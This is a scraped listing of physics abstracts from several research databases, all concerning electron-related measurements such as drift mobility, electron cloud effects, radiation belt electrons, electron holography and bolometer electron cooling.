Excitation CERN Document Server Martinez Turtos, Rosana; Pizzichemi, Marco; Ghezzi, Alessio; Pauwels, Kristof; Auffray, Etiennette; Lecoq, Paul; Paganoni, Marco 2016-01-01 The determination of the intrinsic light yield $(LY_{int})$ of scintillating crystals, i.e. number of optical photons created per amount of energy deposited, constitutes a key factor in order to characterize and optimize their energy and time resolution. However, until now measurements of this quantity are affected by large uncertainties and often rely on corrections for bulk absorption and surface/edge state. The novel idea presented in this contribution is based on the confinement of the scintillation emission in the central upper part of a 10 mm cubic crystal using a 1.5 MeV electron beam with diameter of 1 mm. A black non-reflective pinhole aligned with the excitation point is used to fix the light extraction solid angle (narrower than total reflection angle), which then sets a light cone travel path through the crystal. The final number of photoelectrons detected using a Hamamatsu R2059 photomultiplier tube (PMT) was corrected for the extraction solid angle, the Fresnel reflection coefficient and quantum... 20. The practical model of electron emission in the radioisotope battery by fast ions International Nuclear Information System (INIS) Erokhine, N.S.; Balebanov, V.M. 2003-01-01 Under the theoretical analysis of secondary-emission radioisotope source of current the estimate of energy spectrum F(E) of secondary electrons with energy E emitted from films is the important problem. This characteristic knowledge allows, in particular, studying the volt-ampere function, the dependence of electric power deposited in the load on the system parameters and so on. Since the rigorous calculations of energy spectrum F(E) are the complicated enough and labour-intensive there is necessity to elaborate the practical model which allows by the simple computer routine on the basis of generalized data (both experimental measurements and theoretical calculations) on the stopping powers and mean free path of suprathermal electrons to perform reliable express-estimates of the energy spectrum F(E) and the volt-ampere function I(V) for the concrete materials of battery emitter films. This paper devoted to description of of the practical model to calculate electron emission characteristics under the passage of fast ion fluxes from the radioisotope source through the battery emitter. The analytical approximations for the stopping power of emitter materials, the electron inelastic mean free path, the ion production of fast electrons and the probability for them to arrive the film surface are taken into account. In the cases of copper and gold films, the secondary electron escaping depth, the position of energy spectrum peak are considered in the dependence on surface potential barrier magnitude U. According to our calculations the energy spectrum peak shifted to higher electron energy under the U growth. The model described may be used for express estimates and computer simulations of fast alpha-particles and suprathermal electrons interactions with the solid state plasma of battery emitter films, to study the electron emission layer characteristics including the secondary electron escaping depth, to find the optimum conditions for excitation of nonequilibrium 1. Electron drift time in silicon drift detectors: A technique for high precision measurement of electron drift mobility International Nuclear Information System (INIS) Castoldi, A.; Rehak, P. 1995-01-01 This paper presents a precise absolute measurement of the drift velocity and mobility of electrons in high resistivity silicon at room temperature. The electron velocity is obtained from the differential measurement of the drift time of an electron cloud in a silicon drift detector. The main features of the transport scheme of this class of detectors are: the high uniformity of the electron motion, the transport of the signal electrons entirely contained in the high-purity bulk, the low noise timing due to the very small anode capacitance (typical value 100 fF), and the possibility to measure different drift distances, up to the wafer diameter, in the same semiconductor sample. These features make the silicon drift detector an optimal device for high precision measurements of carrier drift properties. The electron drift velocity and mobility in a 10 kΩ cm NTD n-type silicon wafer have been measured as a function of the electric field in the range of possible operation of a typical drift detector (167--633 V/cm). The electron ohmic mobility is found to be 1394 cm 2 /V s. The measurement precision is better than 1%. copyright 1995 American Institute of Physics 2. A data driven method to measure electron charge mis-identification rate CERN Document Server Bakhshiansohi, Hamed 2009-01-01 Electron charge mis-measurement is an important challenge in analyses which depend on the charge of electron. To estimate the probability of {\\it electron charge mis-measurement} a data driven method is introduced and a good agreement with MC based methods is achieved.\\\\ The third moment of $\\phi$ distribution of hits in electron SuperCluster is studied. The correlation between this variable and the electron charge is also investigated. Using this `new' variable and some other variables the electron charge measurement is improved by two different approaches. 3. Electron foreshock International Nuclear Information System (INIS) Klimas, A.J. 1985-01-01 ISEE particle and wave data are noted to furnish substantial support for the basic features of the velocity dispersed model at the foreshock boundary that was proposed by Filbert and Kellogg (1979). Among many remaining discrepancies between this model and observation, it is noted that unstable reduced velocity distributions have been discovered behind the thin boundary proposed by the model, and that these are at suprathermal energies lying far below those explainable in terms of an oscillating, two-stream instability. Although the long-theorized unstable beam of electrons has been found in the foreshock, there is still no ready explanation of the means by which it could have gotten there. 16 references 4. ANTHEM: a two-dimensional multicomponent self-consistent hydro-electron transport code for laser-matter interaction studies International Nuclear Information System (INIS) Mason, R.J. 1982-01-01 The ANTHEM code for the study of CO 2 -laser-generated transport is outlined. ANTHEM treats the background plasma as coupled Eulerian thermal and ion fluids, and the suprathermal electrons as either a third fluid or a body of evolving collisional PIC particles. The electrons scatter off the ions; the suprathermals drag against the thermal background. Self-consistent E- and B-fields are computed by the Implicit Moment Method. The current status of the code is described. Typical output from ANTHEM is discussed with special application to Augmented-Return-Current CO 2 -laser-driven targets 5. Microscopic Electron Variations Measured Simultaneously By The Cluster Spacecraft Science.gov (United States) Buckley, A. M.; Carozzi, T. D.; Gough, M. P.; Beloff, N. Data is used from the Particle Correlator experiments running on each of the four Cluster spacecraft so as to determine common microscopic behaviour in the elec- tron population observed over the macroscopic Cluster separations. The Cluster par- ticle correlator experiments operate by forming on board Auto Correlation Functions (ACFs) generated from short time series of electron counts obtained, as a function of electron energy, from the PEACE HEEA sensor. The information on the microscopic variation of the electron flux covers the frequency range DC up to 41 kHz (encom- passing typical electron plasma frequencies and electron gyro frequencies and their harmonics), the electron energy range is that covered by the PEACE HEEA sensor (within the range 1 eV to 26 keV). Results are presented of coherent electron struc- tures observed simultaneously by the four spacecraft in the differing plasma interac- tion regions and boundaries encountered by Cluster. As an aid to understanding the plasma interactions, use is made of numerical simulations which model both the un- derlying statistical properties of the electrons and also the manner in which particle correlator experiments operate. 6. Dielectronic recombination measurements using the Electron Beam Ion Trap International Nuclear Information System (INIS) Knapp, D.A. 1991-01-01 We have used the Electron Beam Ion Trap at LLNL to study dielectronic recombination in highly charged ions. Our technique is unique because we observe the x-rays from dielectronic recombination at the same time we see x-rays from all other electron-ion interactions. We have recently taken high-resolution, state-selective data that resolves individual resonances 7. Front-End Electronics for Verification Measurements: Performance Evaluation and Viability of Advanced Tamper Indicating Measures International Nuclear Information System (INIS) Smith, E.; Conrad, R.; Morris, S.; Ramuhalli, P.; Sheen, D.; Schanfein, M.; Ianakiev, K.; Browne, M.; Svoboda, J. 2015-01-01 The International Atomic Energy Agency (IAEA) continues to expand its use of unattended, remotely monitored measurement systems. An increasing number of systems and an expanding family of instruments create challenges in terms of deployment efficiency and the implementation of data authentication measures. A collaboration between Pacific Northwest National Laboratory (PNNL), Idaho National Laboratory (INL), and Los Alamos National Laboratory (LANL) is working to advance the IAEA's capabilities in these areas. The first objective of the project is to perform a comprehensive evaluation of a prototype front-end electronics package, as specified by the IAEA and procured from a commercial vendor. This evaluation begins with an assessment against the IAEA's original technical specifications and expands to consider the strengths and limitations over a broad range of important parameters that include: sensor types, cable types, and the spectrum of industrial electromagnetic noise that can degrade signals from remotely located detectors. A second objective of the collaboration is to explore advanced tamper-indicating (TI) measures that could help to address some of the long-standing data authentication challenges with IAEA's unattended systems. The collaboration has defined high-priority tampering scenarios to consider (e.g., replacement of sensor, intrusion into cable), and drafted preliminary requirements for advanced TI measures. The collaborators are performing independent TI investigations of different candidate approaches: active time-domain reflectometry (PNNL), passive noise analysis (INL), and pulse-by-pulse analysis and correction (LANL). The initial investigations focus on scenarios where new TI measures are retrofitted into existing IAEA UMS deployments; subsequent work will consider the integration of advanced TI methods into new IAEA UMS deployments where the detector is separated from the front-end electronics. In this paper, project progress 8. Detailed Characteristics of Radiation Belt Electrons Revealed by CSSWE/REPTile Measurements Science.gov (United States) Zhang, K.; Li, X.; Schiller, Q.; Gerhardt, D. T.; Millan, R. M. 2016-12-01 The outer radiation belt electrons are highly dynamic. We study the detailed characteristics of the relativistic electrons in the outer belt using measurements from the Colorado Student Space Weather Experiment (CSSWE) mission, a low Earth orbit Cubesat, which transverses the radiation belt four times in one orbit ( 1.5 hr) and has the advantage of measuring the dynamic activities of the electrons including their rapid precipitations. Among the features of the relativistic electrons, we show the measured electron distribution as a function of geomagnetic activities and local magnetic field strength. Moreover, a specific precipitation band, which happened on 19 Jan 2013, is investigated based on the conjunctive measurement of CSSWE and the Balloon Array for Radiation belt Relativistic Electron Losses (BARREL). In this precipitation band event, the net loss of the 0.58 1.63 MeV electrons (L=3.5 6) is estimated to account for 6.84% of the total electron content. 9. Direct electron production measurements by DELCO at SPEAR International Nuclear Information System (INIS) Kirkby, J.; Stanford Univ., Calif. 1977-01-01 We have observed weakly-produced electrons in e + e - annihilations above Esub(c.m.) approximately 3.75 GeV. In the course of a scan through this threshold region we observed the 3 D 1 state of charmonium with a mass 3770+-6 MeV/c 2 , width GAMMA = 24+-5 MeV and partial width to electron pairs GAMMAsub(ee) = 180+-60 eV. This resonance (named PSI'(3770)) provides a value for the D semileptonic branching ratio of 11+-3%. On the assumption of the Cabibbo nature involved, the PSI' electron momentum spectrum indicates a substantial contribution from the mode D→Kev. A comparison of the events having only two visible prongs (of which only one is an electron) with the heavy lepton hypotheses shows no disagreement. Alternative hypotheses have not yet been investigated. (orig.) [de 10. Damage measurement of structural material by electron backscatter diffraction. Quantification of measurement quality toward standardization of measurement procedure International Nuclear Information System (INIS) Kamaya, Masayuki 2011-01-01 Several attempts have been made to assess the damage induced in materials by crystal orientation distributions identified using electron backscatter diffraction (EBSD). In particular, the local misorientation, which is the misorientation between neighboring measurement points, was shown to correlate well with the degree of material damage such as plastic strain, fatigue and creep. However, the damage assessments conducted using the local misorientations were qualitative rather than quantitative. The local misorientation can be correlated theoretically with physical parameters such as dislocation density. However, the error in crystal orientation measurements makes quantitative evaluation of the local misorientation difficult. Furthermore, the local misorientation depends on distance between the measurement points (step size). For a quantitative assessment of the local misorientation, the error in the crystal orientation measurements must be reduced or the degree of error must be shown quantitatively. In this study, first, the influence of the quality of measurements (accuracy of measurements) and step size on the local misorientation was investigated using stainless steel specimens damaged by tensile deformation or fatigue. By performing the crystal orientation measurements with different conditions, it was shown that the quality of measurement could be represented by the error index, which was previously proposed by the author. Secondly, a filtering process was applied in order to improve the accuracy of crystal orientation measurements and its effect was investigated using the error index. It was revealed that the local misorientations obtained under different measurement conditions could be compared quantitatively only when the error index and the step size were almost or exactly the same. It was also shown that the filtering process could successfully reduce the measurement error and step size dependency of the local misorientations. By applying the filtering 11. Galileo Measurements of the Jovian Electron Radiation Environment Science.gov (United States) Garrett, H. B.; Jun, I.; Ratliff, J. M.; Evans, R. W.; Clough, G. A.; McEntire, R. W. 2003-12-01 The Galileo spacecraft Energetic Particle Detector (EPD) has been used to map Jupiter's trapped electron radiation in the jovian equatorial plane for the range 8 to 16 Jupiter radii (1 jovian radius = 71,400 km). The electron count rates from the instrument were averaged into 10-minute intervals over the energy range 0.2 MeV to 11 MeV to form an extensive database of observations of the jovian radiation belts between Jupiter orbit insertion (JOI) in 1995 and end of mission in 2003. These data were then used to provide differential flux estimates in the jovian equatorial plane as a function of radial distance (organized by magnetic L-shell position). These estimates provide the basis for an omni-directional, equatorial model of the jovian electron radiation environment. The comparison of these results with the original Divine model of jovian electron radiation and their implications for missions to Jupiter will be discussed. In particular, it was found that the electron dose predictions for a representative mission to Europa were about a factor of 2 lower than the Divine model estimates over the range of 100 to 1000 mils (2.54 to 25.4 mm) of aluminum shielding, but exceeded the Divine model by about 50% for thicker shielding for the assumed Europa orbiter trajectories. The findings are a significant step forward in understanding jovian electron radiation and represent a valuable tool for estimating the radiation environment to which jovian science and engineering hardware will be exposed. 12. Theory and measurement of the electron cloud effect International Nuclear Information System (INIS) Harkey, K. C. 1999-01-01 Photoelectrons produced through the interaction of synchrotrons radiation and the vacuum chamber walls can be accelerated by a charged particle beam, acquiring sufficient energy to produce secondary electrons (SES) in collisions with the walls. If the secondary-electron yield (SEY) coefficient of the wall material is greater than one, a run-away condition can develop. In addition to the SEY, the degree of amplification depends on the beam intensity and temporal distribution. As the electron cloud builds up along a train of stored bunches, a transverse perturbation of the head bunch can be communicated to trailing bunches in a wakefield-like interaction with the cloud. The electron cloud effect is especially of concern for the high-intensity PEP-II (SLAC) and KEK B-factories and at the Large Hadron Collider (LHC) at CERN. An initiative was undertaken at the Advanced Photon Source (APS) storage ring to characterize the electron cloud in order to provide realistic limits on critical input parameters in the models and improve their predictive capabilities. An intensive research program was undertaken at CERN to address key issues relating to the LHC. After giving an overview, the recent theoretical and experimental results from the APS and the other laboratories will be discussed 13. Theory and measurement of the electron cloud effect CERN Document Server Harkay, K C 1999-01-01 Photoelectrons produced through the interaction of synchrotron radiation and the vacuum chamber walls can be accelerated by a charged particle beam, acquiring sufficient energy to produce secondary electrons (SEs) in collisions with the walls. If the secondary-electron yield (SEY) coefficient of the wall material is greater than one, a runaway condition can develop. In addition to the SEY, the degree of amplification depends on the beam intensity and temporal distribution. As the electron cloud builds up along a train of stored bunches, a transverse perturbation of the head bunch can be communicated to trailing bunches in a wakefield-like interaction with the cloud. The electron cloud effect is especially of concern for the high-intensity PEP-II (SLAC) and KEK B-factories and at the Large Hadron Collider (LHC) at CERN. An initiative was undertaken at the Advanced Photon Source (APS) storage ring to characterize the electron cloud in order to provide realistic limits on critical input parameters in the models ... 14. Digital holography with electron wave: measuring into the nanoworld Science.gov (United States) Mendoza Santoyo, Fernando; Voelkl, Edgar 2016-04-01 Dennis Gabor invented Holography in 1949. His main concern at the time was centered on the spherical aberration correction in the recently created electron microscopes, especially after O. Scherzer had shown mathematically that round electron optical lenses always have a positive spherical aberration coefficient and the mechanical requirements for minimizing the spherical aberration were too high to allow for atomic resolution. At the time the lack of coherent electron sources meant that in-line holography was developed using quasi-coherent light sources. As such Holography did not produce scientific good enough results to be considered a must use tool. In 1956, G. Moellenstedt invented a device called a wire-biprism that allowed the object and reference beams to be combined in an off-axis configuration. The invention of the laser at the end of the 1950s gave a great leap to Holography since this light source was highly coherent and hence led to the invention of Holographic Interferometry during the first lustrum of the 1960s. This new discipline in the Optics field has successfully evolved to become a trusted tool in a wide variety of areas. Coherent electron sources were made available only by the late 1970s, a fact that gave an outstanding impulse to electron holography so that today nanomaterials and structures belonging to a wide variety of subjects can be characterized in regards to their physical and mechanical parameters. This invited paper will present and discuss electron holography's state of the art applications to study the shape of nanoparticles and bacteria, and the qualitative and quantitative study of magnetic and electric fields produced by novel nano-structures. 15. Pulse height measurements and electron attachment in drift chambers operated with Xe,CO2 mixtures CERN Document Server Andronic, A 2003-01-01 We present pulse height measurements in drift chambers operated with Xe,CO2 gas mixtures. We investigate the attachment of primary electrons on oxygen and SF6 contaminants in the detection gas. The measurements are compared with simulations of properties of drifting electrons. We present two methods to check the gas quality: gas chromatography and Fe55 pulse height measurements using monitor detectors. 16. Pulse height measurements and electron attachment in drift chambers operated with Xe,CO2 mixtures International Nuclear Information System (INIS) Andronic, A.; Appelshaeuser, H.; Blume, C.; Braun-Munzinger, P.; Bucher, D.; Busch, O.; Ramirez, A.C.A. Castillo; Catanescu, V.; Ciobanu, M.; Daues, H.; Devismes, A.; Emschermann, D.; Fateev, O.; Garabatos, C.; Herrmann, N.; Ivanov, M.; Mahmoud, T.; Peitzmann, T.; Petracek, V.; Petrovici, M.; Reygers, K.; Sann, H.; Santo, R.; Schicker, R.; Sedykh, S.; Shimansky, S.; Simon, R.S.; Smykov, L.; Soltveit, H.K.; Stachel, J.; Stelzer, H.; Tsiledakis, G.; Vulpescu, B.; Wessels, J.P.; Windelband, B.; Winkelmann, O.; Xu, C.; Zaudtke, O.; Zanevsky, Yu.; Yurevich, V. 2003-01-01 We present pulse height measurements in drift chambers operated with Xe,CO 2 gas mixtures. We investigate the attachment of primary electrons on oxygen and SF 6 contaminants in the detection gas. The measurements are compared with simulations of properties of drifting electrons. We present two methods to check the gas quality: gas chromatography and 55 Fe pulse height measurements using monitor detectors 17. Measurements of electron cloud growth and mitigation in dipole, quadrupole, and wiggler magnets Energy Technology Data Exchange (ETDEWEB) Calvey, J.R., E-mail: [email protected]; Hartung, W.; Li, Y.; Livezey, J.A.; Makita, J.; Palmer, M.A.; Rubin, D. 2015-01-11 Retarding field analyzers (RFAs), which provide a localized measurement of the electron cloud, have been installed throughout the Cornell Electron Storage Ring (CESR), in different magnetic field environments. This paper describes the RFA designs developed for dipole, quadrupole, and wiggler field regions, and provides an overview of measurements made in each environment. The effectiveness of electron cloud mitigations, including coatings, grooves, and clearing electrodes, are assessed with the RFA measurements. 18. Dark-field electron holography for the measurement of geometric phase International Nuclear Information System (INIS) Hytch, M.J.; Houdellier, F.; Huee, F.; Snoeck, E. 2011-01-01 The genesis, theoretical basis and practical application of the new electron holographic dark-field technique for mapping strain in nanostructures are presented. The development places geometric phase within a unified theoretical framework for phase measurements by electron holography. The total phase of the transmitted and diffracted beams is described as a sum of four contributions: crystalline, electrostatic, magnetic and geometric. Each contribution is outlined briefly and leads to the proposal to measure geometric phase by dark-field electron holography (DFEH). The experimental conditions, phase reconstruction and analysis are detailed for off-axis electron holography using examples from the field of semiconductors. A method for correcting for thickness variations will be proposed and demonstrated using the phase from the corresponding bright-field electron hologram. -- Highlights: → Unified description of phase measurements in electron holography. → Detailed description of dark-field electron holography for geometric phase measurements. → Correction procedure for systematic errors due to thickness variations. 19. Electron beam based transversal profile measurements of intense ion beams International Nuclear Information System (INIS) El Moussati, Said 2014-01-01 A non-invasive diagnostic method for the experimental determination of the transverse profile of an intense ion beam has been developed and investigated theoretically as well as experimentally within the framework of the present work. The method is based on the deflection of electrons when passing the electromagnetic field of an ion beam. To achieve this an electron beam is employed with a specifically prepared transversal profile. This distinguish this method from similar ones which use thin electron beams for scanning the electromagnetic field [Roy et al. 2005; Blockland10]. The diagnostic method presented in this work will be subsequently called ''Electron-Beam-Imaging'' (EBI). First of all the influence of the electromagnetic field of the ion beam on the electrons has been theoretically analyzed. It was found that the magnetic field causes only a shift of the electrons along the ion beam axis, while the electric field only causes a shift in a plane transverse to the ion beam. Moreover, in the non-relativistic case the magnetic force is significantly smaller than the Coulomb one and the electrons suffer due to the magnetic field just a shift and continue to move parallel to their initial trajectory. Under the influence of the electric field, the electrons move away from the ion beam axis, their resulting trajectory shows a specific angle compared to the original direction. This deflection angle practically depends just on the electric field of the ion beam. Thus the magnetic field has been neglected when analysing the experimental data. The theoretical model provides a relationship between the deflection angle of the electrons and the charge distribution in the cross section of the ion beam. The model however only can be applied for small deflection angles. This implies a relationship between the line-charge density of the ion beam and the initial kinetic energy of the electrons. Numerical investigations have been carried out to clarify the 20. Electron localization functions and local measures of the covariance ∑ Indian Academy of Sciences (India) Unknown rectly from the correlated electron density, without recourse to the Kohn-Sham orbitals,33–35 and in §2.5 we discuss this approach and offer a small refine- ment. Throughout these sections, we shall use the neon atom as a representative example. In §2.6, we extend our analysis to the argon, krypton, and xenon atoms. 1. In situ Electrical measurements in Transmission Electron Microscopy NARCIS (Netherlands) Rudneva, M. 2013-01-01 In the present thesis the combination of real-time electricalmeasurements on nano-sampleswith simultaneous examination by transmission electron microscope (TEM) is discussed. Application of an electrical current may lead to changes in the samples thus the possibility to correlate such changes with 2. Radial profile of the electron distribution from electron cyclotron emission measurements Energy Technology Data Exchange (ETDEWEB) Tribaldos, V.; Krivenski, V. 1993-07-01 A numerical study is presented, showing the possibility to invert the electron distribution function from a small set of non-thermal spectra, for a regime of lower hybrid current drive. (Author) 7 refs. 3. Radial profile of the electron distribution from electron cyclotron emission measurements International Nuclear Information System (INIS) Tribaldos, V.; Krivenski, V. 1993-01-01 A numerical study is presented, showing the possibility to invert the electron distribution function from a small set of non-thermal spectra, for a regime of lower hybrid current drive. (Author) 7 refs 4. Measurement of peripheral electron temperature by electron cyclotron emission during the H-mode transition in JFT-2M tokamak International Nuclear Information System (INIS) Hoshino, Katsumichi; Yamamoto, Takumi; Kawashima, Hisato 1987-01-01 Time evolution and profile of peripheral electron temperature during the H-mode like transition in a tokamak plasma is measured using the second and third harmonic of electron cyclotron emission (ECE). The so called ''H-mode'' state which has good particle/energy confinement is characterized by sudden decrease in the spectral line intensity of deuterium molecule. Such a sudden decrease in the line intensity of D α with good energy confinement is found not only in divertor discharges, but also in limiter dischargs in JFT-2M tokamak. It is found by the measurement of ECE that the peripheral electron temperature suddenly increases in both of such phases. The relation between H-transition and the peripheral electron temperature or its profile is investigated. (author) 5. Temperature dependence of electron mean free path in molybdenum from ultrasonic measurements Energy Technology Data Exchange (ETDEWEB) Almond, D P; Detwiler, D A; Rayne, J A [Carnegie-Mellon Univ., Pittsburgh, Pa. (USA) 1975-09-08 The temperature dependence of the electronic mean free path in molybdenum has been obtained from ultrasonic attenuation measurements.For temperature up to 30 K a T/sup -2/ law is followed suggesting the importance of electron-electron scattering in the attenuation mechanism. 6. What do we learn from polarization measurements in deep-inelastic electron-nucleon scattering International Nuclear Information System (INIS) Anselmino, M. 1979-01-01 We examine what can be learned from deep-inelastic electron-nucleon scattering with polarized initial electrons and measurement of the polarization of the final electrons. A direct evaluation of the separate structure functions W 1 and W 2 is shown to be possible 7. Direct measurement of electron density in microdischarge at atmospheric pressure by Stark broadening International Nuclear Information System (INIS) Dong Lifang; Ran Junxia; Mao Zhiguo 2005-01-01 We present a method and results for measurement of electron density in atmospheric-pressure dielectric barrier discharge. The electron density of microdischarge in atmospheric pressure argon is measured by using the spectral line profile method. The asymmetrical deconvolution is used to obtain Stark broadening. The results show that the electron density in single filamentary microdischarge at atmospheric pressure argon is 3.05x10 15 cm -3 if the electron temperature is 10,000 K. The result is in good agreement with the simulation. The electron density in dielectric barrier discharge increases with the increase of applied voltage 8. The Inner Structure of Collisionless Magnetic Reconnection: The Electron-Frame Dissipation Measure and Hall Fields Science.gov (United States) Zenitani, Seiji; Hesse, Michael; Klimas, Alex; Black, Carrie; Kuznetsova, Masha 2011-01-01 It was recently proposed that the electron-frame dissipation measure, the energy transfer from the electromagnetic field to plasmas in the electron s rest frame, identifies the dissipation region of collisionless magnetic reconnection [Zenitani et al., Phys. Rev. Lett. 106, 195003 (2011)]. The measure is further applied to the electron-scale structures of antiparallel reconnection, by using two-dimensional particle-in-cell simulations. The size of the central dissipation region is controlled by the electron-ion mass ratio, suggesting that electron physics is essential. A narrow electron jet extends along the outflow direction until it reaches an electron shock. The jet region appears to be anti-dissipative. At the shock, electron heating is relevant to a magnetic cavity signature. The results are summarized to a unified picture of the single dissipation region in a Hall magnetic geometry. 9. The inner structure of collisionless magnetic reconnection: The electron-frame dissipation measure and Hall fields International Nuclear Information System (INIS) Zenitani, Seiji; Hesse, Michael; Klimas, Alex; Black, Carrie; Kuznetsova, Masha 2011-01-01 It was recently proposed that the electron-frame dissipation measure, the energy transfer from the electromagnetic field to plasmas in the electron's rest frame, identifies the dissipation region of collisionless magnetic reconnection [Zenitani et al., Phys. Rev. Lett. 106, 195003 (2011)]. The measure is further applied to the electron-scale structures of antiparallel reconnection, by using two-dimensional particle-in-cell simulations. The size of the central dissipation region is controlled by the electron-ion mass ratio, suggesting that electron physics is essential. A narrow electron jet extends along the outflow direction until it reaches an electron shock. The jet region appears to be anti-dissipative. At the shock, electron heating is relevant to a magnetic cavity signature. The results are summarized to a unified picture of the single dissipation region in a Hall magnetic geometry. 10. The inner structure of collisionless magnetic reconnection: The electron-frame dissipation measure and Hall fields Energy Technology Data Exchange (ETDEWEB) Zenitani, Seiji; Hesse, Michael; Klimas, Alex; Black, Carrie; Kuznetsova, Masha [NASA Goddard Space Flight Center, Greenbelt, Maryland 20771 (United States) 2011-12-15 It was recently proposed that the electron-frame dissipation measure, the energy transfer from the electromagnetic field to plasmas in the electron's rest frame, identifies the dissipation region of collisionless magnetic reconnection [Zenitani et al., Phys. Rev. Lett. 106, 195003 (2011)]. The measure is further applied to the electron-scale structures of antiparallel reconnection, by using two-dimensional particle-in-cell simulations. The size of the central dissipation region is controlled by the electron-ion mass ratio, suggesting that electron physics is essential. A narrow electron jet extends along the outflow direction until it reaches an electron shock. The jet region appears to be anti-dissipative. At the shock, electron heating is relevant to a magnetic cavity signature. The results are summarized to a unified picture of the single dissipation region in a Hall magnetic geometry. 11. Electron transport measurements in methane using an improved pulsed Townsend technique International Nuclear Information System (INIS) Hunter, S.R.; Carter, J.G.; Christophorou, L.G. 1986-01-01 An improved pulsed Townsend technique for the measurement of electron transport parameters in gases is described. The accuracy and sensitivity of the technique have been investigated by performing, respectively, electron attachment coefficient measurements in pure O 2 over a wide range of E/N at selected O 2 pressures and by determining the electron attachment and ionization coefficients and electron drift velocity in CH 4 over a wide E/N range. Good agreement has been obtained between the present and the previously published electron attachment coefficients in O 2 and for the drift velocity measurements in CH 4 . The data on the electron attachment coefficient in CH 4 (measured for the first time) showed that with the present improved pulsed Townsend method, electron attachment coefficients up to 10 times smaller than the ionization coefficients at a given E/N value can be accurately measured. Our measurements of the electron attachment and ionization coefficients in CH 4 are in good agreement with a Boltzmann equation analysis of the electron gain and loss processes in CH 4 using published electron scattering cross sections for this molecule 12. Electron Bernstein Wave Coupling and Emission Measurements on NSTX Czech Academy of Sciences Publication Activity Database Taylor, G.; Diem, S.J.; Caughman, J.; Efthimion, P.; Harvey, R.W.; LeBlanc, B.P.; Philips, C.K.; Preinhaelter, Josef; Urban, Jakub 2006-01-01 Roč. 51, č. 7 (2006), s. 177 ISSN 0003-0503. [Annual Meeting of the Division of Plasma Physics/48th./. Philadelphia, Pennsylvania , 30.10.2006-3.11.2006] Institutional research plan: CEZ:AV0Z20430508 Keywords : Conversion * Emission * Tokamaks * Electron Bernstein waves * Simulation * MAST * NSTX Subject RIV: BL - Plasma and Gas Discharge Physics http://www.aps.org/meet/DPP06/baps/all_DPP06.pdf 13. Thermal Electron Bernstein Wave Emission Measurements on NST Czech Academy of Sciences Publication Activity Database Diem, S.J.; Taylor, G.; Efthimion, P.; LeBlanc, B.P.; Philips, C.K.; Caughman, J.; Wilgen, J.B.; Harvey, R.W.; Preinhaelter, Josef; Urban, Jakub 2006-01-01 Roč. 51, č. 7 (2006), s. 134 ISSN 0003-0503. [Annual Meeting of the Division of Plasma Physics/48th./. Philadelphia, Pennsylvania , 30.10.2006-3.11.2006] Institutional research plan: CEZ:AV0Z20430508 Keywords : Conversion * Emission * Tokamaks * Electron Bernstein waves * Simulation * MAST * NSTX Subject RIV: BL - Plasma and Gas Discharge Physics http://www.aps.org/meet/DPP06/baps/all_DPP06.pdf 14. Electron beam dose measurements with alanine/ESR dosimeter International Nuclear Information System (INIS) Rodrigues, O. Jr.; Galante, O.L.; Campos, L.L. 2001-01-01 When the aminoacid alanine, CH 3 -CH(NH 2 )-COOH, is exposed to radiation field, stable free radicals are produced. The predominant paramagnetic specie found at room temperature is the CH 3 -CH-COOH. Electron Spin Resonance - ESR is a technique used for quantification and analysis of radicals in solid and liquid samples. The evaluation of the amount of produced radicals can be associated with the absorbed dose . The alanine/ESR is an established dosimetry method employed for high doses evaluation, it presents good performance for X-rays, gamma, electrons, and protons radiation detection. The High Doses Dosimetry Laboratory of Ipen developed a dosimetric system based on alanina/ESR that presents good characteristics for use in gamma fields such as: wide dose range from 10 to 10 5 Gy, low fading, low uncertainty (<5%), no dose rate dependence and non-destructive ESR single readout. The detector is encapsulated in a special polyethylene tube that reduces the humidity problems and improves the mechanical resistance. The IPEN dosimeter was investigated for application in electron beam fields dosimetry 15. Rocket measurements of X-rays and energetic electrons through an auroral arc International Nuclear Information System (INIS) Aarsnes, K.; Stadsnes, J.; Soeraas, F. 1976-01-01 Preliminary results from rocket measurements on auroral electron precipitation are discussed as far as the spatial structure and time and space variations in the primary electron fluxes are concerned. The analysis demonstrates that there was a good overall correspondence between the X-ray and electron data. By using a well collimated X-ray detector on a spinning rocket, it was possible to get additional information on the overall electron precipitation pattern 16. Direct measurement of macroscopic electric fields produced by collective effects in electron-impact experiments International Nuclear Information System (INIS) Velotta, R.; Avaldi, L.; Camilloni, R.; Giammanco, F.; Spinelli, N.; Stefani, G. 1996-01-01 The macroscopic electric field resulting from the space charge produced in electron-impact experiments has been characterized by using secondary electrons of well-defined energy (e.g., Auger or autoionizing electrons) as a probe. It is shown that the measurement of the kinetic-energy shifts suffered by secondary electrons is a suitable tool for the analysis of the self-generated electric field in a low-density plasma. copyright 1996 The American Physical Society 17. Strong Electron Self-Cooling in the Cold-Electron Bolometers Designed for CMB Measurements Science.gov (United States) Kuzmin, L. S.; Pankratov, A. L.; Gordeeva, A. V.; Zbrozhek, V. O.; Revin, L. S.; Shamporov, V. A.; Masi, S.; de Bernardis, P. 2018-03-01 We have realized cold-electron bolometers (CEB) with direct electron self-cooling of the nanoabsorber by SIN (Superconductor-Insulator-Normal metal) tunnel junctions. This electron self-cooling acts as a strong negative electrothermal feedback, improving noise and dynamic properties. Due to this cooling the photon-noise-limited operation of CEBs was realized in array of bolometers developed for the 345 GHz channel of the OLIMPO Balloon Telescope in the power range from 10 pW to 20 pW at phonon temperature Tph =310 mK. The negative electrothermal feedback in CEB is analogous to TES but instead of artificial heating we use cooling of the absorber. The high efficiency of the electron self-cooling to Te =100 mK without power load and to Te=160 mK under power load is achieved by: - a very small volume of the nanoabsorber (0.02 μm3) and a large area of the SIN tunnel junctions, - effective removal of hot quasiparticles by arranging double stock at both sides of the junctions and close position of the normal metal traps, - self-protection of the 2D array of CEBs against interferences by dividing them between N series CEBs (for voltage interferences) and M parallel CEBs (for current interferences), - suppression of Andreev reflection by a thin layer of Fe in the AlFe absorber. As a result even under high power load the CEBs are working at electron temperature Te less than Tph . To our knowledge, there is no analogue in the bolometers technology in the world for bolometers working at electron temperature colder than phonon temperature. 18. Simulations and measurements in scanning electron microscopes at low electron energy Czech Academy of Sciences Publication Activity Database Walker, C.; Frank, Luděk; Müllerová, Ilona 2016-01-01 Roč. 38, č. 6 (2016), s. 802-818 ISSN 0161-0457 R&D Projects: GA TA ČR(CZ) TE01020118; GA MŠk(CZ) LO1212; GA MŠk ED0017/01/01 EU Projects: European Commission(XE) 606988 - SIMDALEE2 Institutional support: RVO:68081731 Keywords : Monte Carlo modeling * scanned probe * computer simulation * electron-solid interactions * surface analysis Subject RIV: JA - Electronics ; Optoelectronics, Electrical Engineering Impact 